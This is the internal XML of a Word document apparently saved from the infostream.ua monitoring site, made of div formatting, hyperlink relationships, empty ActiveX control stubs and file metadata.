                <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="857816850">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                    <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                    <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1592619394">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                        <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                        <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1873106732">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                            <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                            <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1950770256">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="1548180666">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                    <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                    <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="896865911">
                                      <w:marLeft w:val="0"/>
                                      <w:marRight w:val="0"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                        <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                        <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                      </w:divBdr>
                                      <w:divsChild>
                                        <w:div w:id="745079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75101245">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="988024734">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1455951164">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                    <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                    <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1082995928">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                        <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                        <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1037241577">
                          <w:blockQuote w:val="1"/>
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="120"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                        </w:div>
                        <w:div w:id="12283030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77770222">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1666929865">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="566962932">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="19696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14556">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1385712783">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1427385245">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2117671984">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="127823607">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="56974703">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1038319251">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                    <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                    <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1790197486">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                        <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                        <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1815096519">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                            <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                            <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="2016178964">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="876313161">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                    <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                    <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="123426370">
                                      <w:marLeft w:val="0"/>
                                      <w:marRight w:val="0"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                        <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                        <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                      </w:divBdr>
                                      <w:divsChild>
                                        <w:div w:id="1862279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46899191">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="698240544">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1096898961">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                    <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                    <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="598485050">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                        <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                        <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="122188973">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="240"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                            <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                            <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="277034645">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="1661734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3603852">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                            <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                            <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1767068279">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="1083798649">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                    <w:left w:val="single" w:sz="2" w:space="6" w:color="auto"/>
                                    <w:bottom w:val="single" w:sz="2" w:space="9" w:color="auto"/>
                                    <w:right w:val="single" w:sz="2" w:space="6"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infostream.ua/i-help.php?type=inter" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://online.infostream.ua/eng/cab.php?type=psource" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.wmf"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.wmf"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://online.infostream.ua/eng/stat.php" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX7.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX11.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.wmf"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="javascript:OpenWin('/help/samples.html','',500,500,'right','50','top','50')" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX1.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://online.infostream.ua/i-help.php?type=ispersonal" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://online.infostream.ua/eng/cab.php?type=canal" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX2.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.wmf"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX9.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX13.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://online.infostream.ua/cab.php" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://online.infostream.ua/eng/source.php" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX4.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.wmf"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://online.infostream.ua/eng/full.php?q=bitcoin%26%28crime%7Ccriminal%7Cillegal%7Cillicit%7Claundering%7Cdrugs%7C%28Silk~Road%29%7Cdarknet%7Ccashout%29+&amp;flist=on&amp;sd=200901&amp;ed=201112" TargetMode="Externa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hyperlink" Target="https://online.infostream.ua/i-help.php?type=about" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.wmf"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX6.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.wmf"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX10.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.wmf"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://online.infostream.ua/i-help.php?type=prim" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://online.infostream.ua/eng/" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.wmf"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX8.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="javascript:OpenWin('/help/help.html','',500,500,'right','50','top','50')" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://online.infostream.ua/i-help.php" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://online.infostream.ua/cab.php?type=stat" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.wmf"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX12.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://online.infostream.ua/logout.php" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://online.infostream.ua/i-help.php?type=lang" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://infostream.ua/" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX3.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX5.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.wmf"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.wmf"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX14.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://online.infostream.ua/" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.gif"/><Relationship Id="rId3"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22-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2-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX10.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D112-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX11.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D112-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX12.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D112-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX13.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D112-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX14.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389</Pages>
  <Words>297939</Words>
  <Characters>1698256</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>14152</Lines>
  <Paragraphs>3984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1992211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DWL</dc:creator>
  <cp:lastModifiedBy>DWL</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-29T07:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-29T07:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>